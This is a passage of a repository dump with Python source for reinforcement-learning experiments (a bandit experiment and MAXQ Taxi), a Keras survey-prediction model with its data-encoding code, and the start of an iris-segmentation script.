true_error)\n tf.summary.scalar('avg_true_error', tf.reduce_mean(true_error))\n\n # Error\n square_error = tf.pow(tf.reduce_sum(error, axis=1), 2, name='square_error')\n tf.summary.scalar('avg_square_error', tf.reduce_mean(square_error))\n tf.summary.histogram('square_error', square_error)\n\n tf.summary.histogram('reward', tf.reduce_sum(reward, axis=1))\n tf.summary.histogram('delta', tf.reduce_sum(delta, axis=1))\n tf.summary.histogram('q_estimated', q_estimated)\n\n summaries = tf.summary.merge_all()\n\n return summaries, train_op\n\n\ndef run_experiment(params, optimizer):\n\n summaries, train_op = create_graph(params, optimizer)\n\n with tf.Session() as sess:\n writer = tf.summary.FileWriter(params.output_dir, sess.graph)\n sess.run(tf.global_variables_initializer())\n\n for step in range(params.steps):\n summ, _ = sess.run([summaries, train_op])\n writer.add_summary(summ, global_step=step)\n\n writer.close()\n\n\ndef delta_sample_average(params, error, n):\n return error / n\n\n\ndef recency_weighted(params, error, n):\n return error * params.alpha\n\n\noptimizers = {\n 'sample_average': delta_sample_average,\n 'recency_weighted': delta_sample_average,\n}\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Run multi-armed bandit experiment')\n parser.add_argument('--epsilon',\n type=float,\n help='Ratio of exploration actions')\n parser.add_argument('--games',\n type=int,\n default=2000,\n help='Number of games')\n parser.add_argument('--steps',\n type=int,\n default=1000,\n help='Number of steps for each game')\n parser.add_argument('--arms',\n type=int,\n default=10,\n help='Number of bandit arms')\n parser.add_argument('--optimizer', type=str,\n default='sample_average',\n nargs='?',\n help='''Function for delta Q calculation. Possible\n values: sample_average, recency_weighted.''')\n parser.add_argument('--alpha', type=float,\n default=0.1,\n nargs='?',\n help='Alpha parameter for recency_weighted optimizer')\n parser.add_argument('--init_q', type=float,\n default=0.0,\n nargs='?',\n help='Initial value of Q')\n parser.add_argument('output_dir', type=str,\n metavar='output_dir',\n help='Statistics directory for Tensorboard')\n args = parser.parse_args()\n\n optimizer = optimizers[args.optimizer]\n\n run_experiment(args, optimizer)\n" }, { "alpha_fraction": 0.5341529846191406, "alphanum_fraction": 0.5469034314155579, "avg_line_length": 34.41935348510742, "blob_id": "ae6e27940e53dbb7c1efaad1e6d5870fbaef8872", "content_id": "abd86dfa2ca3ed0e514bcb7e4b1c6a3fe4303231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2196, "license_type": "no_license", "max_line_length": 95, "num_lines": 62, "path": "/hierarchical-with-maxq-decomposition/rl/optimizer.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .graph import get_default_graph\n\nepsilon = 0.00000001\n\n\ndef _move(x, target, alpha, episode, max_episodes):\n global epsilon\n k = min(1.0, float(episode) / float(max_episodes))\n alpha = max(epsilon, alpha * (1.0 - k))\n return (1.0 - alpha) * x + alpha * target\n\n\nclass Optimizer:\n\n def __init__(\n self,\n graph=None,\n learning_rate=0.02,\n discount_factor=0.9,\n steps=1000):\n if graph is None:\n graph = get_default_graph()\n self._graph = graph\n assert self._graph is not None\n self._learning_rate = learning_rate\n self._discount_factor = discount_factor\n self._episodes = steps\n\n def optimize(self, episode_num, stack, next_state, done):\n self._episode = episode_num\n\n # update actions on stack in reverse order\n for idx in reversed(range(len(stack))):\n action, _, state = stack[idx]\n if not action.is_done(next_state) and not done:\n return\n if action.is_primitive():\n parent_action, _, _ = stack[idx - 1]\n reward = 0 if parent_action.is_done(next_state) else -1\n self._update_v(action, state, reward)\n else:\n sub_action, ticks, state = stack[idx + 1]\n self._update_c(\n action,\n state,\n sub_action,\n ticks,\n next_state)\n\n def _update_v(self, action, state, reward):\n assert action.is_primitive()\n v = self._graph.get_v(action, state)\n v = _move(v, reward, self._learning_rate, self._episode, self._episodes)\n self._graph.set_v(action, state, v)\n\n def _update_c(self, action, state, sub_action, ticks, next_state):\n assert not action.is_primitive()\n target = np.power(self._discount_factor, ticks) * self._graph.get_v(action, next_state)\n c = self._graph.get_c(action, state, sub_action)\n c = _move(c, target, self._learning_rate, self._episode, self._episodes)\n self._graph.set_c(action, state, sub_action, c)\n" }, { "alpha_fraction": 0.5424247980117798, "alphanum_fraction": 0.5516184568405151, "avg_line_length": 28.162012100219727, "blob_id": "58a8a6cede24423b417a8693cd5103f320b457f4", "content_id": "2e234f4e7972a82795d0801412575d39e69c36cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5229, "license_type": "no_license", "max_line_length": 73, "num_lines": 179, "path": "/hierarchical-with-maxq-decomposition/main.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport gym\n\nimport rl\nfrom taxi import evaluate, print_best_actions, print_v, print_c, print_q\n\n\nn_episodes = 10000\nmax_steps = 200\n\n\n# Taxi-v2 specific graph\ndef create_graph(env):\n env = env.unwrapped\n # Creating graph from bottom to the top\n target_coords = [(0, 0), (4, 0), (0, 4), (3, 4)]\n\n # Navigate tasks (parameterized)\n navigate_tasks = [\n create_navigate_task(env, target_coord)\n for target_coord in target_coords\n ]\n\n # Dropoff\n def dropoff_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, dest_idx\n dropoff = rl.Task(\"D\", 5, state_tr=dropoff_state)\n\n # Pickup\n def pickup_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_y, taxi_x, pass_idx\n pickup = rl.Task(\"P\", 4)\n\n # Get task\n def pickup_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, pass_idx\n\n def picked_up(state):\n taxi_x, taxi_y, pass_idx = state\n return pass_idx == 4\n\n get = rl.Task(\"get\", state_tr=pickup_state, term_predicate=picked_up)\n get += pickup\n for navigate_task in navigate_tasks:\n get += navigate_task\n\n # Put task\n def put_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, pass_idx, dest_idx\n\n def taxi_empty(state):\n taxi_x, taxi_y, pass_idx, dest_idx = state\n return pass_idx != 4\n\n put = rl.Task(\"put\", state_tr=put_state, term_predicate=taxi_empty)\n put += dropoff\n for navigate_task in navigate_tasks:\n put += navigate_task\n\n # Root task\n # TODO: term_predicate\n root = rl.Task(\"root\", term_predicate=lambda state: False)\n root += get\n root += put\n return root\n\n\ndef create_navigate_task(env, target_coord):\n env = env.unwrapped\n def coord_and_target_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, target_coord[0], target_coord[1]\n # Creating graph from bottom to the top\n south = rl.Task(\"↓\", 0, state_tr=coord_and_target_state)\n north = rl.Task(\"↑\", 1, state_tr=coord_and_target_state)\n east = rl.Task(\"→\", 2, state_tr=coord_and_target_state)\n west = rl.Task(\"←\", 3, state_tr=coord_and_target_state)\n\n # Navigate task\n def coord_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y\n\n def reached_target(state):\n taxi_x, taxi_y = state\n x, y = target_coord\n return x == taxi_x and y == taxi_y\n\n navigate = rl.Task(\n \"navigate\",\n params=target_coord,\n state_tr=coord_state,\n term_predicate=reached_target)\n navigate += north\n navigate += south\n navigate += east\n navigate += west\n\n return navigate\n\n\ndef train(env, graph=None):\n global n_episodes\n global max_steps\n\n if graph is None:\n graph = rl.get_default_graph()\n assert graph is not None\n\n optimizer = rl.Optimizer(\n graph=graph,\n learning_rate=0.5,\n discount_factor=1.0,\n steps=n_episodes)\n root = graph.root()\n\n for i in range(n_episodes):\n state = env.reset()\n stack = [(root, 0, state)] # action, ticks, state0\n step = 0\n\n try:\n for _ in range(max_steps):\n if root.is_done(state):\n break\n k = min(1.0, float(i) / float(n_episodes * 0.33))\n k = 1.0 - k\n epsilon = 0.05 * k\n action, stack = rl.get_action(\n graph,\n stack,\n state,\n epsilon=epsilon)\n next_state, reward, done, debug = env.step(action)\n optimizer.optimize(i, stack, next_state, done)\n state = next_state\n step += 1\n if done:\n break\n except KeyError as error:\n print('episode {}, step {}'.format(i, step))\n print('state: {}', list(env.unwrapped.decode(state)))\n env.render()\n rl.print_stack(stack)\n raise error\n\n print(\"{} solved in {} steps\".format(i, step))\n env.render()\n print('== best_action ==')\n print_best_actions(env.unwrapped, graph)\n print('== V ==')\n print_v(env.unwrapped, graph, root)\n for sub_task in root.get_actions():\n print('== Q({}) =='.format(sub_task.name))\n print_q(env.unwrapped, graph, root, sub_task)\n print('== C({}) =='.format(sub_task.name))\n print_c(env.unwrapped, graph, root, sub_task)\n print('C map size: {}'.format(len(graph._c)))\n # for k, v in graph._c.items():\n # print(k, v)\n print('V map size: {}'.format(len(graph._v)))\n # for k, v in graph._v.items():\n # print(k, v)\n\n\nif __name__ == '__main__':\n env = gym.make('Taxi-v2')\n # target_coord = (3, 4)\n root = create_graph(env)\n root = root.get(\"get\")\n\n graph = rl.Graph(root)\n train(env, graph=graph)\n evaluate(env, graph)\n env.close()\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 62.25, "blob_id": "343b2d8d34cf00070aa3779305c362a5c6134399", "content_id": "8c4aac5dd68a95561dc5a7bc849f120078a1ba22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": "no_license", "max_line_length": 101, "num_lines": 4, "path": "/README.md", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "# Reproducing experiments from the book \"Reinforcement Learning\" by Sutton and Barto (second edition)\n\nThis repository is for educational purposes (Learning by doing).\nHere I reproduce the experiments and implement core deep RL algorithms from scratch.\n" }, { "alpha_fraction": 0.5238811373710632, "alphanum_fraction": 0.5344114303588867, "avg_line_length": 26.412370681762695, "blob_id": "0314bd9b4054c95790c95e5517a7e728716a19f7", "content_id": "bb696a89955b9063e287b694591486becbd1e050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2659, "license_type": "no_license", "max_line_length": 74, "num_lines": 97, "path": "/hierarchical-with-maxq-decomposition/taxi/evaluate.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import sys\nimport time\nfrom six import StringIO\n\nimport rl\n\n\ndef _print_env(env, fn, pass_idx=3, dest_idx=0, mode='human'):\n outfile = StringIO() if mode == 'ansi' else sys.stdout\n\n outfile.write(\"+----------+\\n\")\n for y in range(0, 5):\n outfile.write(\"|\")\n for x in range(0, 5):\n state = env.unwrapped.encode(y, x, pass_idx, dest_idx)\n outfile.write(fn(state) + \" \")\n outfile.write(\"|\")\n outfile.write(\"\\n\")\n outfile.write(\"+----------+\\n\")\n\n if mode != 'human':\n s = outfile.getvalue()\n outfile.close()\n return s\n\n\ndef print_best_actions(env, graph, mode='human'):\n def fn(state):\n action = graph.root()\n while not action.is_primitive():\n action = graph.get_best_action(action, state)\n return action.name\n return _print_env(env, fn, mode=mode)\n\n\ndef print_v(env, graph, action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_v(action, state)))\n\n\ndef print_c(env, graph, action, child_action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_c(action, state, child_action)))\n\n\ndef print_q(env, graph, action, child_action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_q(action, state, child_action)))\n\n\ndef evaluate(env, graph):\n episode = 0\n while True:\n print(\"== Episode {} ==\".format(episode))\n _play_episode(env, graph)\n episode += 1\n\n\ndef _play_episode(env, graph):\n root = graph.root()\n state = env.reset()\n stack = [(root, 0, state)]\n\n done = False\n step = 0\n\n while not done:\n if root.is_done(state):\n break\n\n action, stack = rl.get_action(\n graph,\n stack,\n state,\n epsilon=0.0)\n state, reward, done, debug = env.step(action)\n\n env_str = env.render(mode='ansi').getvalue()\n env_str = env_str.split('\\n')\n action_str = print_best_actions(env, graph, mode='ansi')\n action_str = action_str.split('\\n')\n\n print(\"Step {}\".format(step))\n print(\" state: {}\".format(list(env.unwrapped.decode(state))))\n idx = 0\n for env_line, action_line in zip(env_str, action_str):\n stack_str = \"\"\n if idx < len(stack):\n task, ticks, _ = stack[idx]\n stack_str = \"({} {})\".format(task.name, ticks)\n idx += 1\n print(\" {} {} {}\".format(env_line, action_line, stack_str))\n print()\n\n step += 1\n\n time.sleep(1)\n" } ]
15
pars3c/prediction_model_1
https://github.com/pars3c/prediction_model_1
493a5e2466103d6d6c061dab0461382fa1b5993a
68f70ef7d92062150f895d4612780a93e2daf250
f4450de681ec633d9609e72e7bfe98e435510a8e
refs/heads/master
2021-05-06T20:18:36.781312
2017-11-30T15:18:17
2017-11-30T15:18:17
112,380,458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47431233525276184, "alphanum_fraction": 0.5318003296852112, "avg_line_length": 62.62963104248047, "blob_id": "6d388048e566257b88bd31df108986a3f03a5ea0", "content_id": "e8a64e99cf494bb446b8da9deb14fa0f9e2c64c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6871, "license_type": "no_license", "max_line_length": 154, "num_lines": 108, "path": "/data_format.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "import pandas as pd\ndef data_form2():\n csv_path = \"survey_new.csv\"\n data = pd.read_csv(csv_path, sep=\",\")\n df = pd.DataFrame(data)\n df[\"Country\"] = df[\"Country\"].replace(['United States', 'Canada', 'United Kingdom', 'Bulgaria', 'France', 'Portugal',\n 'Netherlands', 'Switzerland', 'Latvia', 'Germany', 'Ireland', 'Romania',\n 'Belgium', 'Sweden', 'New Zealand', 'Zimbabwe', 'Brazil', 'Spain', 'India',\n 'Finland', 'Uruguay', 'Australia', 'Israel', 'Italy', 'Bosnia and Herzegovina',\n 'Austria', 'Hungary', 'Singapore', 'Poland', 'Japan', 'Nigeria', 'Russia',\n 'South Africa', 'Croatia', 'Norway', 'Thailand', 'Denmark', 'Mexico',\n 'Bahamas', 'Greece', 'Moldova', 'Colombia', 'Georgia', 'China',\n 'Czech Republic', 'Philippines', 'Slovenia', 'Costa Rica'],['1', '2', '3', '4', '5', '6',\n '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25',\n '26', '27', '28', '29', '30', '31', '32',\n '33', '34', '35', '36', '37', '38',\n '39', '40', '41', '42', '43', '44',\n '45', '46', '47', '48'])\n df[\"Country\"] = df[\"Country\"].astype(int)\n\n return df[\"Country\"]\ndef data_form():\n \n csv_path = \"survey_new.csv\"\n data = pd.read_csv(csv_path, sep=\",\")\n df = pd.DataFrame(data)\n\n \n df[\"Year\"] = df.Timestamp.str.split(\"-\").str.get(0)\n df[\"Year\"] = df[\"Year\"].astype(int)\n df[\"Month\"] = df.Timestamp.str.split(\"-\").str.get(1)\n df[\"Month\"] = df[\"Month\"].astype(int)\n df[\"Day\"] = df.Timestamp.str.split(\"-\").str.get(2)\n df[\"Day\"] = df.Day.str.split(\" \").str.get(0)\n df[\"Day\"] = df[\"Day\"].astype(int)\n df[\"Age\"] = df[\"Age\"].astype(int)\n df[\"Gender\"] = df[\"Gender\"].astype(int)\n \n df[\"Country\"] = df[\"Country\"].replace(['United States', 'Canada', 'United Kingdom', 'Bulgaria', 'France', 'Portugal',\n 'Netherlands', 'Switzerland', 'Latvia', 'Germany', 'Ireland', 'Romania',\n 'Belgium', 'Sweden', 'New Zealand', 'Zimbabwe', 'Brazil', 'Spain', 'India',\n 'Finland', 'Uruguay', 'Australia', 'Israel', 'Italy', 'Bosnia and Herzegovina',\n 'Austria', 'Hungary', 'Singapore', 'Poland', 'Japan', 'Nigeria', 'Russia',\n 'South Africa', 'Croatia', 'Norway', 'Thailand', 'Denmark', 'Mexico',\n 'Bahamas', 'Greece', 'Moldova', 'Colombia', 'Georgia', 'China',\n 'Czech Republic', 'Philippines', 'Slovenia', 'Costa Rica'],['1', '2', '3', '4', '5', '6',\n '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25',\n '26', '27', '28', '29', '30', '31', '32',\n '33', '34', '35', '36', '37', '38',\n '39', '40', '41', '42', '43', '44',\n '45', '46', '47', '48'])\n df[\"Country\"] = df[\"Country\"].astype(int)\n df[\"state\"] = df[\"state\"].fillna(\"NA\").replace(['NA', 'IL', 'IN', 'TX', 'TN', 'MI', 'OH', 'CA', 'CT', 'MD', 'NY', 'NC', 'MA', 'IA', 'PA',\n 'WA', 'WI', 'SC', 'OR', 'VT', 'UT', 'SD', 'CO', 'AL', 'OK', 'GA', 'NV', 'NJ', 'NH', 'ID',\n 'MS', 'KY', 'AZ', 'VA', 'KS', 'MN', 'FL', 'RI', 'WY', 'MO', 'NM', 'NE', 'LA', 'DC', 'ME',\n 'WV'], ['-9999', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30',\n '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45'\n ])\n df[\"state\"] = df[\"state\"].astype(int)\n df['self_employed'] = df['self_employed'].fillna(\"-9999\").replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"self_employed\"] = df[\"self_employed\"].astype(int)\n df['family_history'] = df['family_history'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"family_history\"] = df[\"family_history\"].astype(int)\n df['treatment'] = df['treatment'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"treatment\"] = df[\"treatment\"].astype(int)\n df['work_interfere'] = df['work_interfere'].fillna(\"-9999\").replace([\"Sometimes\", \"Often\", \"Rarely\", \"Never\"], [\"3\", \"2\", \"1\", \"0\"])\n df[\"work_interfere\"] = df[\"work_interfere\"].astype(int)\n df['no_employees'] = df['no_employees'].replace([\"1-5\", \"6-25\", \"26-100\", \"100-500\", \"500-1000\", \"More than 1000\"], [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"])\n df[\"no_employees\"] = df[\"no_employees\"].astype(int)\n df['remote_work'] = df['remote_work'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"remote_work\"] = df[\"remote_work\"].astype(int)\n df['tech_company'] = df['tech_company'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"tech_company\"] = df[\"tech_company\"].astype(int)\n df['benefits'] = df['benefits'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"benefits\"] = df[\"benefits\"].astype(int)\n df['care_options'] = df['care_options'].replace([\"Yes\", \"No\", \"Not sure\"], [\"1\", \"0\", \"-9999\"])\n df[\"care_options\"] = df[\"care_options\"].astype(int)\n df['seek_help'] = df['seek_help'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"seek_help\"] = df[\"seek_help\"].astype(int)\n df['anonymity'] = df['anonymity'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"anonymity\"] = df[\"anonymity\"].astype(int)\n df['leave'] = df['leave'].replace([\"Don't know\", \"Very easy\", \"Somewhat easy\", \"Somewhat difficult\", \"Very difficult\"], [\"-9999\", \"1\", \"2\", \"3\", \"4\"])\n df[\"leave\"] = df[\"leave\"].astype(int)\n df['mental_health_consequence'] = df['mental_health_consequence'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_health_consequence\"] = df[\"mental_health_consequence\"].astype(int)\n df['phys_health_consequence'] = df['phys_health_consequence'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"phys_health_consequence\"] = df[\"phys_health_consequence\"].astype(int)\n df['coworkers'] = df['coworkers'].replace([\"Yes\", \"No\", \"Some of them\"], [\"1\", \"0\", \"2\"])\n df[\"coworkers\"] = df[\"coworkers\"].astype(int)\n df['supervisor'] = df['supervisor'].replace([\"Yes\", \"No\", \"Some of them\"], [\"1\", \"0\", \"2\"])\n df[\"supervisor\"] = df[\"supervisor\"].astype(int)\n df['mental_health_interview'] = df['mental_health_interview'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_health_interview\"] = df[\"mental_health_interview\"].astype(int)\n df['phys_health_interview'] = df['phys_health_interview'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"phys_health_interview\"] = df[\"phys_health_interview\"].astype(int)\n df['mental_vs_physical'] = df['mental_vs_physical'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_vs_physical\"] = df[\"mental_vs_physical\"].astype(int)\n df['obs_consequence'] = df['obs_consequence'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"obs_consequence\"] = df[\"obs_consequence\"].astype(int)\n df['wellness_program'] = df['wellness_program'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"wellness_program\"] = df[\"wellness_program\"].astype(int)\n \n return df" }, { "alpha_fraction": 0.5560538172721863, "alphanum_fraction": 0.6188340783119202, "avg_line_length": 30.809524536132812, "blob_id": "77da3d5ecfa0a41cf562f17a94644eca8adb0f04", "content_id": "c5718790a7d57bce914ba9b9f26f1332f1287f0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 106, "num_lines": 21, "path": "/load_data.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "from keras.models import Sequential\nfrom keras.layers import Dense \nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nimport pandas as pd\nimport numpy as np\n\nmodel = Sequential()\npred_data = np.array([[ 32, 0, -9999, -9999, 0, 0, 1, 2, 0, 1, 0, 0,\n 0, 0, -9999, 3, 0, 0, 1, 1, 1, 1, 0, 0,\n 2014, 8, 27]])\n\n\nmy_model = load_model(\"model_file.h5\")\npredictions = my_model.predict(pred_data) \n\n# Calculate predicted probability of survival: predicted_prob_true\npredicted_prob_true = predictions \n\n# print predicted_prob_true\nprint(predicted_prob_true) \n" }, { "alpha_fraction": 0.7233782410621643, "alphanum_fraction": 0.7454100251197815, "avg_line_length": 21.72222137451172, "blob_id": "38b99f57cd4bc7b076b6767b5c403fafb7f4e6b0", "content_id": "48c91d423011d103d39faf2e8e7c448edf039e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 79, "num_lines": 36, "path": "/__main__.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "import string\nimport os\nfrom keras.models import Sequential\nfrom keras.layers import Dense \nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nimport pandas as pd\nimport numpy as np\nfrom data_format import data_form, data_form2\n\nearly_stopping_monitor = EarlyStopping(patience=5)\n\ndf = data_form()\ndf2 = data_form2()\n\n\ndf = df.drop(['Timestamp'], axis=1)\ndf = df.drop(['Country'], axis=1)\npredictors = df.as_matrix()\ntarget = df2.as_matrix()\n\n\n\n\nn_cols = predictors.shape[1]\nmodel = Sequential()\n\nmodel.add(Dense(200, input_shape = (n_cols,)))\nmodel.add(Dense(32))\nmodel.add(Dense(1))\n\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\nmodel.fit(predictors, target, epochs=500, callbacks = [early_stopping_monitor])\n# Calculate predictions: predictions\nmodel.save(\"model_file.h5\")" } ]
3
pedrosanchesagftec/IrisSeg
https://github.com/pedrosanchesagftec/IrisSeg
4928053bd811fc65c6cbba54cb09041cb0f8a2d0
f5895580166734e17a85bc9a85a1a81186ea372d
bb83a62773133b36daec0d77833a20f73d4510f8
refs/heads/master
2022-01-09T13:45:48.231782
2018-06-06T15:46:21
2018-06-06T15:46:21
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48652973771095276, "alphanum_fraction": 0.5295321941375732, "avg_line_length": 27.057451248168945, "blob_id": "9e2b0660c3236e37ea250f4846c4dbb94f0d2231", "content_id": "15b17de55a080c1706908e0cb914b8de0d34fa01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15627, "license_type": "no_license", "max_line_length": 103, "num_lines": 557, "path": "/GrabCutIris_LevelSets_Ellipse.py", "repo_name": "pedrosanchesagftec/IrisSeg", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport sys\nimport time\nimport morphsnakes\nfrom cv2 import cv\nfrom scipy.misc import imread\nfrom matplotlib import pyplot as ppl\nimport urllib2\nimport math\nimport random\nimport os\n#import cv2.cv as cv\n\nprint '*** Iris segmentation using GAC and GrabCut (PSIVT Workshops 2015) ***'\nprint '*** Authors - Sandipan Banerjee & Domingo Mery ***'\nprint '*** Usage - python GrabCutIris_LevelSets_Ellipse.py <filename> *** \\n'\n\nsegF = 'SegResults'\nif not os.path.exists(segF):\n os.makedirs(segF)\n#f1 = open('resultsFinal.txt','a+')\nlvl_left = -1\nlvl_right = -1\nlvl_up = -1\nlvl_down = -1\n\np_left = -1\np_right = -1\np_up = -1\np_down = -1\n\nBLUE = [255,0,0] # rectangle color\nRED = [0,0,255] # PR BG\nGREEN = [0,255,0] # PR FG\nBLACK = [0,0,0] # sure BG\nWHITE = [255,255,255] # sure FG\n\nDRAW_BG = {'color' : GREEN, 'val' : 0}\nDRAW_FG = {'color' : RED, 'val' : 1}\nDRAW_PR_FG = {'color' : BLACK, 'val' : 3}\nDRAW_PR_BG = {'color' : WHITE, 'val' : 2}\n\ntemp_det = []\nlastcx = -1\nlastcy = -1\nlastr = -1\n#print __doc__\n\n# Loading images\nif len(sys.argv) == 2:\n filename = sys.argv[1] # for drawing purposes\nelse:\n print 'Image not found!'\n\n#f1.write(filename)\n#f1.write(',')\n\nimg = cv2.imread(filename)\nimg2 = img.copy() # copies of the original image\nimg3 = img.copy()\ncimg = img.copy()\n#img4 - img.copy()\neyeball_bw = np.zeros(img.shape,np.uint8)\niris_bw = np.zeros(img.shape,np.uint8)\niter = 0\n#img2 = img.copy() \n\n# Stage 1 - Intensity profiling\n\nh,w,d = img.shape\nh3 = h/3\nw3 = w/3\n\nlft = 1*w3\nrt = 2*w3\nup = 1*h3\ndown = 2*h3\n\nhor_l = [0]*(int(down-up)/5 + 1)\nver_l = [0]*(int(rt-lft)/5 + 1)\ntemp_l = []\nhor_list = []\nver_list = []\nmin_val = 100\nellipse_size = 0\nmin_x = 0\nmin_y = 0\nmaxf = 0\nmaxs = 0\neoc = 0\n\ni = lft\nj = up\nwhile i <= rt:\n j = up\n while j <= down:\n if int(img[j][i][0]) < min_val:\n min_val = int(img[j][i][0])\n j += 1\n i += 1\n\nm = 0\nn = up\nk = 0\nmax_blah = 0\nwhile n <= down:\n m = lft\n while m <= rt:\n temp = int(img[n][m][0])\n if temp < (min_val + 20):\n hor_l[k] += 1 \n img3[n][m] = (0,255,0)\n temp_l.append([m,n])\n else:\n img3[n][m] = (255,255,255)\n m += 1\n if hor_l[k] > max_blah:\n max_blah = hor_l[k]\n hor_list = temp_l\n temp_l = []\n n += 5\n k += 1\n \nfor i in range(len(hor_list)):\n img3[int(hor_list[i][1])][int(hor_list[i][0])] = (0,0,255)\n\nmax_t = max_blah\n\nm = 0\nn = lft\nk = 0\nmax_blah = 0\ntemp_l = []\nwhile n <= rt:\n m = up\n while m <= down:\n temp = int(img[m][n][0])\n if temp < (min_val + 20):\n ver_l[k] += 1 \n img3[m][n] = (0,255,0)\n temp_l.append([n,m])\n else:\n img3[m][n] = (255,255,255)\n m += 1\n if ver_l[k] > max_blah:\n max_blah = ver_l[k]\n ver_list = temp_l\n temp_l = []\n n += 5\n k += 1\n \nfor i in range(len(ver_list)):\n img3[int(ver_list[i][1])][int(ver_list[i][0])] = (255,0,0)\n \nif max_blah > max_t:\n max_t = max_blah\n\ncx = 0\ncy = 0\nhlst = []\nvlst = []\nsumh = 0\nsumv = 0\n\ni = lft\n\nwhile i <= rt:\n j = up\n while j <= down:\n if int(img[j][i][0]) < (min_val + 20):\n hlst.append(i)\n sumh += i\n vlst.append(j)\n sumv += j\n j += 1\n i += 1\n\ncx = int(sumh/len(hlst))\ncy = int(sumv/len(vlst)) \ncx1 = 0\ncy1 = 0\n\nfor i in range(len(hor_list)):\n for j in range(len(ver_list)):\n if (hor_list[i][0] == ver_list[j][0]) and (hor_list[i][1] == ver_list[j][1]):\n cx1 = hor_list[i][0]\n cy1 = hor_list[i][1]\n break\n \nimg3[cy][cx] = (255,255,255)\n\n# Stage 2 - Contour estimation with GAC\n\n# setting up flags\nrect = (0,0,1,1)\ndrawing = False # flag for drawing curves\nrectangle = False # flag for drawing rect\nrect_over = False # flag to check if rect drawn\nrect_or_mask = 100 # flag for selecting rect or mask mode\nvalue = DRAW_FG # drawing initialized to FG\nthickness = 3 # brush thickness\noutput_file = []\niteration = 1\n\n\ndef contour_iterator(contour):\n while contour:\n yield contour\n contour = contour.h_next()\n \nclass FitEllipse:\n\n def __init__(self, source_image, slider_pos):\n self.source_image = source_image\n cv.CreateTrackbar(\"Threshold\", \"Result\", slider_pos, 255, self.process_image)\n self.process_image(slider_pos)\n\n def process_image(self, slider_pos):\n global cimg, source_image1, ellipse_size, maxf, maxs, eoc, lastcx,lastcy,lastr\n \"\"\"\n This function finds contours, draws them and their approximation by ellipses.\n \"\"\"\n stor = cv.CreateMemStorage()\n\n # Create the destination images\n cimg = cv.CloneImage(self.source_image)\n cv.Zero(cimg)\n image02 